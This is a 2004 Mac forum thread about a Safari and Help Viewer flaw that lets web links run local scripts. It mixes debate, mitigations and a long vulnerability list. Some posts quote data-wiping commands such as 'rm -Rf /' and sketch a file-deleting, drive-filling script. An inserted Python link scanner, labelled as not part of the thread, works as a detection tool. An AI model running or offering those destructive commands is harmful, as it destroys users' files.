Mac OS X Security Issue: Local Scripts




MacRumors
May 17, 2004, 04:11 PM
Infoworld reports (http://www.infoworld.com/article/04/05/17/HNmacoshole_1.html) on a new security vulnerability that affects Mac OS X/Safari.

The vulnerability involves the ability for Safari to run arbitrary local scripts on an end-user's computer. In order to accomplish this, a disk image must first be downloaded from the "attacking" website, but this can be tied to a single click.

A demonstration can be found at insecure.ws (http://www.insecure.ws/article.php?story=2004051612423136).



PolarbearTed
May 17, 2004, 04:20 PM
Infoworld reports (http://www.infoworld.com/article/04/05/17/HNmacoshole_1.html) on a new security vulnerability that affects Mac OS X/Safari.

The vulnerability involves the ability for Safari to run arbitrary local scripts on an end-user's computer. In order to accomplish this, a disk image must first be downloaded from the "attacking" website, but this can be tied to a single click.

A demonstration can be found at insecure.ws (http://www.insecure.ws/article.php?story=2004051612423136).

I just read this article on another site, but thanks for the link. I did the demonstration and it indeed is a vulnerability.

I altered some of my settings for Safari as was suggested but I cannot find where to alter this setting:

- change the help helper in InternetConfig (better protection)

If anyone could point me in the right direction, that'd be much appreciated!

Cheers,

PolarbearTed

aethier
May 17, 2004, 04:22 PM
anyways, most people tend to not exploit os x security holes, due to the little amount of people it would harm, we are deemed as a group not worth the effort of a virus...

aethier

Krizoitz
May 17, 2004, 04:22 PM
Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.

nagromme
May 17, 2004, 04:22 PM
No. But at least Apple's issues are fewer, and patched quicker, than in Windows.

Besides, this issue may not even be real. I'm just now trying the demonstration and it doesn

Skiniftz
May 17, 2004, 04:23 PM
Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.
You don't call the ability to run a rm -Rf / on your Mac critical??

Chip NoVaMac
May 17, 2004, 04:25 PM
Oh great why not tell them all how to do it!

Skiniftz
May 17, 2004, 04:30 PM
Oh great why not tell them all how to do it!
If I wanted to be mean I'd post a script to email copies of itself to everyone in your mac address book launched from this exploit (it renders HTML using the Safari engine remember).

I can imagine it now - FREE XXX PR0N CLICK HERE!! *clickety*

leftbanke7
May 17, 2004, 04:36 PM
Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and lo and behold, we get two issues in a week. It is almost as if we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

PolarbearTed
May 17, 2004, 04:37 PM
I think you shouldn't look at it as such a bad thing, no operating system is going to be completely secure. So what, a couple of vulnerabilities come out every so often, but they are fewer and less dramatic than the worms and security issues some Windows users need to deal with.

For those of you interested, I ran the script and it needs to be addressed, since dodgy stuff could be done. But follow the suggestions on the site.


PolarbearTed

Lancetx
May 17, 2004, 04:41 PM
Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and lo and behold, we get two issues in a week. It is almost as if we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

It's not a "holier than thou" attitude, it's just how things really are. To quote an old phrase, if something is the truth then it ain't bragging. Despite the past week's events (which have been highly blown out of proportion BTW) I'll continue to take my chances with OS X over Windows any day of the week...

Mudbug
May 17, 2004, 04:42 PM
While this is unsettling at best, at least the folks who took the time to make the test file had a sense of humor and named their .txt file "owned"

The only good thing about this is that it's REALLY easy to keep from happening.

leftbanke7
May 17, 2004, 04:48 PM
It's not a "holier than thou" attitude, it's just how things really are. To quote an old phrase, if something is the truth then it ain't bragging. Despite the past week's events (which have been highly blown out of proportion BTW) I'll continue to take my chances with OS X over Windows any day of the week...

Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much. For the longest time, the rally cry of many was that OSX had no viruses/trojans/etc and we hammered this point to death when an OSX vs Windows argument would arise. It was only time before somebody decided to drop us down a peg or two and we are now seeing the beginnings of this. I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

Skiniftz
May 17, 2004, 04:55 PM
I don't know what would be worse - deleting data or emailing random iPhoto pics to random people on your address list...

ryanw
May 17, 2004, 04:57 PM
This is ridiculous. Come on .. you can disable the feature in Safari to auto open the .dmg files. This is just like posting an .EXE file that is a virus or trojan or something on a website and clicking on it and telling it to open.

This comes down to "THE WEB", not Safari, not OSX, not Apple. If you are clicking on things, you should know what you're clicking on. You could sign your life away or do extremely illegal things in a few mouse clicks if you are just happily clicking away.

Do we need to start advertising in schools like they did in the 80s with "Don't take candy from strangers."? Now we'll have it say, "Don't click on links on stranger's websites."

forrest
May 17, 2004, 04:59 PM
I have used Apples since the Apple II and have always felt safer than using a PC. However, just because we have a small user base does not mean we are not vulnerable. There are many people who despise the Mac OS and would love to exploit its security flaws. We are lucky that we have these people exposing these flaws prior to any harm being done. The whole Intego thing claiming to have found the first trojan was sketchy and ridiculous, but, it is a good thing that people are willing to write proof of concepts to better secure our beloved OS. It is the publicity of these holes that will only make the Mac OS more secure. And to end, a quote from the website which posted this poc.

It is often like that with computer security problems, it's better to cut the problem at the root because you can never think of all the possibilities. Some things should be strictly forbidden (like executing code from within HTML, that's why Internet Explorer has sooo many problems: it uses language extensions, vb scripting and so on

I have been wary of Safari since its birth because of its ability to run code, web integration is not needed. Keep the browser a browser and the computer harddrive private. Let users decide what is run on their computer, not some web programmer, no matter how noble their intentions.

Spades
May 17, 2004, 05:23 PM
This is the first one that I would call a vulnerability. It's pretty convoluted too. It looks like you have to download and automount the dmg before help runs and executes the script contained within. This is pretty hit and miss. Sometimes it works, sometimes it doesn't. The reason this is a vulnerability though is that a webpage can open an application external to the browser and tell it to perform an arbitrary command on the user's system. That part I do not like. Even if this particular attack has a decent chance of failing (but also a chance of succeeding), the arbitrary execution is a weak link just waiting to be exploited.

But, if you just disable the opening of "safe" files automatically, that will protect you for now. I just think it's only a matter of time before somebody exploits Help to do something really dangerous.

peterjhill
May 17, 2004, 05:28 PM
You don't call the ability to run a rm -Rf / on your Mac critical??


It would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in. Now, doing:

rm -rf ~/ would surely piss a few people off.

elmimmo
May 17, 2004, 05:29 PM
This is ridiculous. Come on .. you can disable the feature in Safari to auto open the .dmg files. This is just like posting an .EXE file that is a virus or trojan or something on a website and clicking on it and telling it to open.

There is NO way in Windows (no way that is not a bug) to bypass an alert window after clicking on a link that points to an .exe

It would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in.

Oh great... So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...

Skiniftz
May 17, 2004, 05:30 PM
It would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in. Now, doing:

rm -rf ~/ would surely piss a few people off.

rm -Rf / would do the same thing, except to all files you could delete, not just limited to your home folder. The OS can always be reinstalled. Your files and configs cannot be so easily.

varmit
May 17, 2004, 05:31 PM
Isn't this just running a program that will kill everything in the user folder. Still takes the user to click on it, it only affects the user and not the whole system, doesn't replicate to other computers.

But I like to know about these things, even though it's manual download and start of the program. So it's like guessing if someone's freeware open source stuff is not going to bite you.

encro
May 17, 2004, 05:31 PM
I would like to point out that this will happen with *ANY* browser or download manager on OS X and not just Safari.

It's rather clever actually :)

corvus
May 17, 2004, 05:32 PM
If I wanted to be mean I'd post a script to email copies of itself to everyone in your mac address book launched from this exploit (it renders HTML using the Safari engine remember).

I can imagine it now - FREE XXX PR0N CLICK HERE!! *clickety*

your point exactly.

most viruses, etc, spread through the principles of social engineering. gullible, non-thinking sheepeople spread viruses.

anyone with a brain will never be caught by anything like this.

hulugu
May 17, 2004, 05:48 PM
Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much...I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

Actually, I've been critical of Microsoft not just because of its vulnerabilities but because of their response which has often been to break the feature rather than fix the initial flaw.
Apple's response to these challenges, especially if quick and accurate will do more for my confidence than the supposed lack of flaws. Every OS has flaws, but it is the vendor's response to the flaws that is important.
Think of it this way, an OS is a cruiseship continually fired upon by an enemy of pirates and miscreants. Sometimes the OS will take a hit, but it is the response to that hit: defend the damaged section, seal the hull, put out the fire or ignore it, dog the hatches and hope it will go away, that decides the ultimate vulnerability of the OS.
So far Microsoft has been telling passengers that the ship is fine, to ignore the smoke and the guy with the parrot who keeps drinking all the martinis.

Computer_Phreak
May 17, 2004, 05:49 PM
Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.


Oh please... there are lots of companies that make their money by finding only vulnerabilities in Linux or Windows.... All of these flaws need to be addressed, no matter how seemingly trivial.

Take a look outside the mac realm, and you'll see security is a _huge_ issue.

benpatient
May 17, 2004, 05:57 PM
bet we see another vague "security update" in software update that "adds internal functionality to safari" or something like that...

I just think it's funny how upset people get about viruses and security on windows machines...i have windows XP (not SP1, either) that has not been updated since installation. I turned off the software update feature altogether when i built the machine, and it's stayed off. I have updated the graphics drivers a couple of times, but really, i just turned the free version of zonealarm on at day 1, and i've had zero security issues to date. Once every 3-4 months i run an online virus check, and i've never had anything on my machine except spyware...which usually came from downloading something i shouldn't have, if you follow.

I sit on a cable connection all day long and somehow have never had to deal with a windows security problem.

maybe it's because i don't use IE or outlook? opera all the way, baby!

that said...i'm pretty surprised by how easy it was to find such a serious problem in OS X's security...think about this set of easily-scripted actions for a second, if you will:

delete all files in user/Pictures
delete all files in user/Movies
delete all files in user/Music
delete all files in user/Documents
search for folders containing "backup" or "archive", etc and delete them
empty trash.

X
n=n+1
create text document "ow[n+2]ned.n."
save in random folder
go to X

(yes, i know the syntax is wrong, but you get the idea, and i don't want to post the correct syntax, anyway)

point being, there's plenty you can do to cause severe damage without actually going outside the bounds of the "secure" core system. Most mac users aren't going to be like "yeah, it deleted all of my files from the last 2 years, all of my music, photos, and movies, and filled up my entire hard drive with 4k randomized junk files that there is no easy way to remove, but at least it didn't get to my kernel! Man, is OS X secure. I'm sure glad i don't have to press 'remove spyware' once a month like those PeeeCeee guys!"

GroundLoop
May 17, 2004, 05:58 PM
While it is true that this will not self-propagate, it is still very dangerous.

First thing, did the latest security update fix the problem associated with the trojan warning on April 9th?

If not, I can only imagine malware writers out there trying to combine this with that trojan proof of concept so that a .dmg or .app posing as a .doc or .pdf is automounted and/or executed.

This is a very critical flaw that will likely be fixed within the next few days. Either way, it still bothers me.

Hickman

dontmatter
May 17, 2004, 06:03 PM
I thought I didn't buy windows.... :mad:

manu chao
May 17, 2004, 06:14 PM
...unless you've got a backup of the >100GB HDD that usually ship today...

You don't have one???
:D

Seriously, I always buy harddrives in pairs, one for using it, one for backing it up (plus a second independent back-up on a dedicated server).

speakster
May 17, 2004, 06:15 PM
Is this vulnerability only looking for items in your user folder?

If you had everything on a 2nd hard drive, would you be immune?

GroundLoop
May 17, 2004, 06:23 PM
Is this vulnerability only looking for items in your user folder?

If you had everything on a 2nd hard drive, would you be immune?

This vulnerability can delete anything that you have access to on your local machine at the time of execution. It can even delete info on mounted network drives with some clever programming.

Hickman

Plastic Chicken
May 17, 2004, 06:29 PM
A good thread on the topic:

http://forums.macnn.com/showthread.php?s=&threadid=213043&perpage=50&pagenumber=1

Conclusions:
The exploit is very serious. Remember, a malicious script would be a small file, so the dmg would download and mount very quickly.
Turning off "Open 'Safe' files after downloading" does NOT help, Safari mounts any disk prefixed with disk://
Someone filed a bug report on it two months ago.
It can affect more than safari because of the way the OS handles addresses.
The best solution, for now, is to download an app that will allow you to change the helper application for "help: " from HelpViewer to something such as Chess.

Also, from Slashdot it appears that the exploit only works on Panther...but don't count on it...

jessefoxperry
May 17, 2004, 06:50 PM
I just read this article on another site, but thanks for the link. I did the demonstration and it indeed is a vulnerability.

I altered some of my settings for Safari as was suggested but I cannot find where to alter this setting:

- change the help helper in InternetConfig (better protection)

If anyone could point me in the right direction, that'd be much appreciated!

Cheers,

PolarbearTed

isn't InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and voilà! nothing happens.

Edit: The MisFox site is in German but the program is in plain English

visor
May 17, 2004, 06:56 PM
Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.

Well, unless you have valuable data on your system, it's not really critical. You might have to reinstall all apps, but else... :rolleyes:

macridah
May 17, 2004, 07:00 PM
now that mac os x is gaining attention, groups out there are trying to prove that mac os x is not 100% protected from virus or attacks. This may be true, but I bet mac os x is a lot safer than windows or linux. Sure it's not 100% safe, but it's the safest OS out there.

Flowbee
May 17, 2004, 07:04 PM
that said...i'm pretty surprised by how easy it was to find such a serious problem in OS X's security...

Yeah... it only took 3 years. :rolleyes:

nagromme
May 17, 2004, 07:04 PM
Flaws in OS X are nothing new. Some serious, some less so, some fixed quickly some less so, some appearing in the press all together in a bunch, some more spaced out. No OS is perfect and nobody (I hope) ever thought so.

None of this approaches the grim reality of Windows--and NOT just because of target size, but because of fundamental and widespread problems on Microsoft's part.

OS X isn't perfect, just much, much better :)

Will we soon have to stop saying there are no Mac viruses? Will we soon have to say... there is ONE? :) Somebody has to be first! And when it happens, Macs will still be more secure than Windows.

manu chao
May 17, 2004, 07:05 PM
There is another vulnerability using telnet, which on the Mac exists with pretty much all browsers, on Windows and Linux apparently only with Opera (pre 7.5). Clicking a URL can write a file to everywhere you are allowed to write and can overwrite any file (without warning) whose name and path is known.

http://www.heise.de/newsticker/meldung/47324 (German)
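Several posts above come down to one mechanism: a link whose URL scheme (help:, disk://, telnet) is handed to a helper application outside the browser. As an added example that is not part of any post in this thread, the following sketch shows how a mail or proxy filter could flag such links in an HTML page before a user reaches them. The scheme list is taken from the thread; the host names, the `PLACEHOLDER` link bodies and all function names are constructed for illustration.

```python
"""Flag links in an HTML page that hand control to an external protocol helper."""
import re
from html.parser import HTMLParser
from typing import List, NamedTuple, Optional

# Schemes named in the thread as reaching a helper outside the browser.
RISKY_SCHEMES = {"help", "disk", "telnet"}
# Attributes that carry a URL the browser will follow or load.
URL_ATTRS = {"href", "src", "action", "data"}
# Tags whose URL is fetched on page load, with no click needed.
AUTO_TAGS = {"iframe", "frame", "img", "embed", "object", "script"}

SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
SCRIPT_LITERAL_RE = re.compile(
    r"[\"']\s*(" + "|".join(sorted(RISKY_SCHEMES)) + r"):", re.IGNORECASE)


class Finding(NamedTuple):
    line: int
    tag: str
    attr: str
    scheme: str
    auto_load: bool  # True when no user click is required


def url_scheme(raw: str) -> Optional[str]:
    """Return the lower-cased scheme of a URL, or None for relative URLs.

    Browsers trim surrounding whitespace and drop tab/CR/LF inside a URL,
    and treat the scheme case-insensitively, so the check does the same.
    """
    cleaned = re.sub(r"[\t\r\n]", "", raw.strip(" \t\r\n\f"))
    match = SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else None


class HelperLinkFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: List[Finding] = []
        self._in_script = False

    def _check(self, tag: str, attr: str, value: str, auto: bool) -> None:
        scheme = url_scheme(value)
        if scheme in RISKY_SCHEMES:
            line = self.getpos()[0]
            self.findings.append(Finding(line, tag, attr, scheme, auto))

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already lower-cased names and decoded entities.
        attr_map = {name: (value or "") for name, value in attrs}
        for name, value in attr_map.items():
            if name in URL_ATTRS:
                self._check(tag, name, value, auto=tag in AUTO_TAGS)
        if tag == "meta" and attr_map.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=target"
            target = attr_map.get("content", "").partition(";")[2].strip()
            if target.lower().startswith("url="):
                target = target[4:]
            self._check(tag, "content", target.strip("'\" "), auto=True)
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Heuristic only: a risky scheme at the start of a quoted string.
        if self._in_script:
            for match in SCRIPT_LITERAL_RE.finditer(data):
                line = self.getpos()[0]
                self.findings.append(Finding(
                    line, "script", "(string literal)",
                    match.group(1).lower(), True))


def scan_html(html: str) -> List[Finding]:
    finder = HelperLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page; hosts and link bodies are placeholders.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=disk://downloads.example.invalid/sample.dmg">
</head><body>
<a href="http://www.example.invalid/article">ordinary link</a>
<a href="HeLp:PLACEHOLDER">mixed-case scheme</a>
<iframe src="&#104;elp:PLACEHOLDER"></iframe>
<a href="/help:about.html">relative path, not a scheme</a>
<script>window.location = "disk://downloads.example.invalid/sample.dmg";</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        how = "loads without a click" if f.auto_load else "needs a click"
        print(f"line {f.line}: <{f.tag} {f.attr}> uses {f.scheme}: ({how})")
```

A filter like this only reduces exposure to pages it sees; reassigning or disabling the helper, as described in the posts above, is what removes the handler itself.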

visor
May 17, 2004, 07:05 PM
Do we need to start advertising in schools like they did in the 80s with "Don't take candy from strangers."? Now we'll have it say, "Don't click on links on stranger's websites."

do you read the sourcecode of every page you visit?

deepkid
May 17, 2004, 07:17 PM
isn't InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and voilà! nothing happens.

Thank you very much. This is helpful and I've passed it on to all of the os x people I know.

rt_brained
May 17, 2004, 07:18 PM
Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and lo and behold, we get two issues in a week. It is almost as if we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.
For a while I thought I was the only one concerned about the same thing. I made the very same comment about too much flag waving. It's pure STUPIDITY to spout off about in a public forum like a child screaming, "You can't catch me, you can't catch me!"

If someone, say a switcher, wants to know if it's true that Macs never get viruses, I suggest pointing them to Apple's website or to their local Apple store.

This is a P.R. game we can all participate in. Lay low, don't talk about it, deny, deny, deny...and hopefully the problem will eventually die out for another 6 or 7 years.

eddyg
May 17, 2004, 07:30 PM
This is a P.R. game we can all participate in. Lay low, don't talk about it, deny, deny, deny...and hopefully the problem will eventually die out for another 6 or 7 years.

I disagree, ignorance is not a good security model, let them attack, attack and attack. There will be flaws, so let's find them and get them fixed.

Let's not worry when a flaw is found, it's natural that there will be some, however they should mostly be less severe than what is found on Windows and also fewer of them.

Cheers, Edward.

GroundLoop
May 17, 2004, 07:37 PM
I disagree, ignorance is not a good security model, let them attack, attack and attack. There will be flaws, so let's find them and get them fixed.

Let's not worry when a flaw is found, it's natural that there will be some, however they should mostly be less severe than what is found on Windows and also fewer of them.

Cheers, Edward.

I would love to agree with you, but this is just too easy to exploit and delete all files that the user has permission to. Yes, the flaw will be fixed, but it is still very nasty.

Hickman

ALoLA
May 17, 2004, 07:47 PM
I make it a general practice not to auto-execute/open/extract anything that's downloaded, whether intentional or accidental. Just safer that way. :) Couldn't this problem be circumvented by simply unchecking the box "Open 'safe' files after downloading" in the General panel of Safari Preferences?

Sailfish
May 17, 2004, 08:03 PM
Remove the Help Viewer application from your System/Library/CoreServices folder.

Burn it to disk.

And/or change your permissions on the original to "yourname" and NO ACCESS for everything, lock it.

The program will be there, you or anything else can't run it.

Be sure to record the original permissions if you do this.

Plastic Chicken
May 17, 2004, 08:12 PM
I make it a general practice not to auto-execute/open/extract anything that's downloaded, whether intentional or accidental. Just safer that way. :) Couldn't this problem be circumvented by simply unchecking the box "Open 'safe' files after downloading" in the General panel of Safari Preferences?

As already stated: no.

marco114
May 17, 2004, 08:39 PM
GO HERE AND BE AMAZED.. no disk image needed:
http://bronosky.com/pub/AppleScript.htm

NOTE THIS IS NOT HARMFUL.

WiseWeasel
May 17, 2004, 08:41 PM
This is much more serious than the articles let on. This security vulnerability in MacOS X affects all web browsers. There's a non-malicious example of the seriousness of the problem here:
http://bronosky.com/pub/AppleScript.htm
That just runs a harmless script (/usr/bin/du; exit) which scrolls a bunch of text and looks scary, but it could easily have been a script to wipe your home directory, and you could have had some serious data loss.

To fix the vulnerability, simply navigate to your [MacOS] X drive, go to the Library folder (not the one in your home folder, but the one in the root directory of your HD), and then to the Documentation folder, and rename the folder "Help" to something else (located at /Library/Documentation/Help). This will prevent people from linking to the script runner. This vulnerability is very serious, and doesn't even have to involve downloading a DMG. Once the "Help" folder is renamed, you won't be able to use the Mac Help center anymore, but at least you will not be at risk of having your data wiped by clicking on a link, or visiting a malicious site. DO THIS NOW!!!!!

Damn, Marco114 beat me to it...

centauratlas
May 17, 2004, 08:44 PM
No. But at least Apple's issues are fewer, and patched quicker

They reported it to Apple 23/02/04. That is HARDLY quick. And it is very serious:

rm -rf /

would be a nightmare.

And security through obscurity is never successful for long. That is why notification to Apple, VERY QUICK fix from Apple, publication is a good technique. When 2 months go by without a fix though, publication to force a fix is required because if one person has found it, others probably have too.

MorganX
May 17, 2004, 09:01 PM
Yeah... it only took 3 years. :rolleyes:

:rolleyes: Here's some vulnerabilities from 2001 through 2004:
2004-05-12: KAME Racoon Malformed ISAKMP Packet Denial of Service Vulnerability
2004-05-12: Racoon IKE Daemon Unauthorized X.509 Certificate
2004-05-11: Apple Mac OS X TrueBlueEnvironment Local Denial Of Service
2004-05-11: Apache Mod_SSL HTTP Request Remote Denial Of Service
2004-05-08: OpenSSL Denial of Service Vulnerabilities
2004-05-08: Sendmail Prescan() Variant Remote Buffer Overrun
2004-05-05: BSD Kernel ARP Cache Flooding Denial of Service Vulnerability
2004-05-04: Apple Mac OS X AppleFileServer Remote Buffer Overflow
2004-05-04: Apple Mac OS X CoreFoundation Unspecified Large Input
2004-05-03: Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow
2004-05-03: Apple QuickTime Sample-to-Chunk Integer Overflow
2004-04-08: OpenSSL ASN.1 Parsing Vulnerabilities
2004-04-07: Samba 'call_trans2open' Remote Buffer Overflow Vulnerability
2004-04-07: Libxml2 Remote URI Parsing Buffer Overrun Vulnerability
2004-04-06: TCPDump ISAKMP Decoding Routines Denial Of Service
2004-04-06: Apple Mac OS X Mail Undisclosed HTML Handling Vulnerability
2004-04-06: CUPS Unspecified Configuration Vulnerability
2004-03-29: TCPDump Malformed RADIUS Packet Denial Of Service
2004-03-29: TCPDump ISAKMP Decoding Routines Multiple Remote Buffer Overflow
2004-03-26: Multiple Vendor Internet Browser Cookie Path Argument Restriction Bypass Vulnerability
2004-03-09: RSync Daemon Mode Undisclosed Remote Heap Overflow
2004-03-06: Apple Safari Large JavaScript Array Handling Denial Of Service
2004-02-27: Apple Mac OS X Apple Filing Protocol Client Multiple
2004-02-24: Apple QuickTime/Darwin Streaming Server DESCRIBE Request Remote Denial of Service Vulnerability
2004-02-24: Apple Mac OS X PPPD Format String Memory Disclosure
2004-02-24: Multiple Apple Mac OS X Local And Remote Vulnerabilities
2004-01-27: Multiple Apple Mac OS X Operating System Component
2004-01-27: Apple Mac OS X TruBlueEnvironment Local Buffer Overflow
2004-01-20: Sendmail Ruleset Parsing Buffer Overflow Vulnerability
2004-01-12: Multiple Vendor Sun RPC xdr_array Buffer Overflow
2003-12-31: Apple MacOS X SecurityServer Daemon Local Denial Of Service Vulnerability
2003-12-23: Apple QuickTime/Darwin Streaming MP3Broadcaster ID3 Tag Handling Vulnerability
2003-12-22: Unix Shell Redirection Race Condition Vulnerability
2003-12-20: Apple MacOS X ASN.1 Decoding Unspecified Remote Denial Of Service Vulnerability
2003-12-20: Apple MacOS X fs_usage Unspecified Local Privilege Escalation Vulnerability
2003-12-20: Apple MacOS X AppleFileServer Unspecified Vulnerability
2003-12-20: Apple MacOS X DHCP Response Root Compromise Vulnerability
2003-12-20: Apple Mac OS X Panther Screen Effects Locking Latency
2003-12-20: MacOSX CD9660.Util Probe For Mounting Argument Local Buffer Overflow Vulnerability
2003-12-05: Apple Safari Web Browser Null Character Cookie Stealing
2003-12-05: AppleShare IP FTP Server RMD Command Denial Of Service
2003-12-05: OpenSSL Bad Version Oracle Side Channel Attack Vulnerability
2003-12-05: OpenSSL CBC Error Information Leakage Weakness
2003-11-20: Apple Mac OS X Jaguar/Panther Multiple Vulnerabilities
2003-11-19: Apple MacOS X Terminal sudo command Unauthorized Access
2003-11-05: Apple MacOS X Terminal Unspecified Unauthorized Access
2003-10-31: MacOS X Local Root Privilege Elevation Vulnerability
2003-10-29: Apple Mac OS X Multiple Vulnerabilities
2003-10-29: Apple Mac OS X 10.3 Unspecified Apple Quicktime Java
2003-10-28: Apple Mac OS X Insecure File Permissions Vulnerabilities
2003-10-28: Apple Mac OS X Core File Symbolic Link Vulnerability
2003-10-28: MacOS X Long Argv Value Kernel Buffer Overrun Vulnerability
2003-10-04: Multiple Vendor C Library realpath() Off-By-One Buffer Overflow Vulnerability
2003-09-27: Sendmail Address Prescan Memory Corruption Vulnerability
2003-09-23: Ntpd Remote Buffer Overflow Vulnerability
2003-09-04: Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
2003-07-28: MacOS X Third Party Application Screen Effects Password Protection Bypass Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server Script Source Disclosure Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server Directory Traversal
2003-07-24: Apple QuickTime/Darwin Streaming Server view_broadcast.cgi Denial of Service Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server parse_xml.cgi Source Disclosure Vulnerability
2003-07-24: Apple Mac OS X Server Workgroup Manager Undisclosed Insecure Account Creation Vulnerability
2003-07-22: CUPS File Descriptor Leakage Denial Of Service Vulnerability
2003-07-22: CUPS Image Filter Zero Width GIF Memory Corruption
2003-07-22: CUPS strncat() Function Call Buffer Overflow Vulnerability
Overflow Vulnerability
2003-06-25: Eric S. Raymond Fetchmail Multidrop Mode Email Header Parsing Heap Overflow Vulnerability
2003-06-13: Apple Mac OS X DSIMPORTEXPORT Information Disclosure Weakness
2003-06-10: BSD TCP/IP Broadcast Connection Check Vulnerability
2003-06-09: Apple AFP Server Arbitrary File Corruption Vulnerability
2003-06-09: Apple Mac OS X Server LDAP Authentication Clear Text Passwords Vulnerability
2003-05-23: Apple QuickTime/Darwin Streaming Server QTSSReflector Module Integer Overflow Vulnerability
2003-05-19: Apple MacOS X IPSec Policy By Port Bypass Vulnerability
2003-05-17: Apple Safari Common Name Certificate Validation Vulnerability
2003-05-15: Sudo Password Prompt Heap Overflow Vulnerability
2003-05-12: Apple AirPort Administrative Password Encryption Weakness
2003-05-06: OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
2003-05-06: OpenSSL ASCII Representation Of Integers Buffer Overflow
2003-05-06: OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
2003-04-23: MacOS X DirectoryService Denial Of Service Vulnerability
2003-04-10: Apple MacOS X DropBox Folder Information Disclosure
2003-04-10: Apple MacOS X DirectoryService Privilege Escalation
2003-03-21: Apple Mac OS X Keychain Access Password Disclosure Weakness
2003-03-02: Multiple Vendor Sun RPC LibC TCP Time-Out Denial Of Service
2003-02-28: Apple QuickTime/Darwin Streaming Server parse_xml.cgi File Disclosure Vulnerability
2003-02-26: Apple QuickTime/Darwin Streaming Administration Server Parse_XML.CGI Directory Listing Vulnerability
2003-02-26: Apple Quicktime/Darwin MP3 Broadcaster Filename Buffer Overrun Vulnerability
2003-02-25: Apple MacOS Classic TruBlueEnvironment Environment Variable Privilege Escalation Vulnerability
2003-02-25: Apple File Protocol iDrive Administrator Login Weakness
2002-12-07: Apple Mac OS X Directory Kernel Panic Denial Of Service
2002-12-02: Multiple Vendor IPSec Implementation Denial of Service
2002-09-13: Mac OS X NetInfo Manager Unauthorized Access Vulnerability
2002-07-24: Apple MacOS iDisk Mail.APP Default Configuration Password Disclosure Vulnerability
2002-07-20: MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability
2002-05-18: MacOS X Sliplogin Buffer Overflow Vulnerability
2002-02-21: Apple MacOS 9 Classic Reverse DNS Lookup DoS Vulnerability
2002-02-08: Apple QuickTime Content-Type Remote Buffer Overflow
2002-01-18: Multiple Vendor FTP glob Expansion Vulnerability
2001-12-29: Apple Mac OS X PPP Authentication Credentials Disclosure
2001-10-31: MacOS 9.2 Local Internet Explorer Helper Application
2001-10-22: MacOS X NetInfo Manager Privilege Escalation Vulnerability
2001-10-09: Apple MacOS X Insecure Default Permissions Vulnerability
2001-09-11: Apple Macintosh OS X FBCIndex File Contents Disclosure
2001-09-11: Apple Macintosh OS X .DS_Store Directory Listing Disclosure
2001-09-04: Apple Mac OS X nidump Password File Disclosure Vulnerability
2001-08-15: Apple Open Firmware Insecure Password Vulnerability
2001-07-09: Windows 2000 Active Directory Authentication Vulnerability
2001-06-28: MacOS Personal Web Sharing Authentication DoS Vulnerability
2001-05-15: MacOS 9 Personal Web Sharing Remote DoS Vulnerability
2001-05-04: Apple MacOS Multiple Users Password Bypass Vulnerability
2001-03-15: rwhod Remote Denial of Service Vulnerability
2001-02-05: Crontab File Disclosure Vulnerability
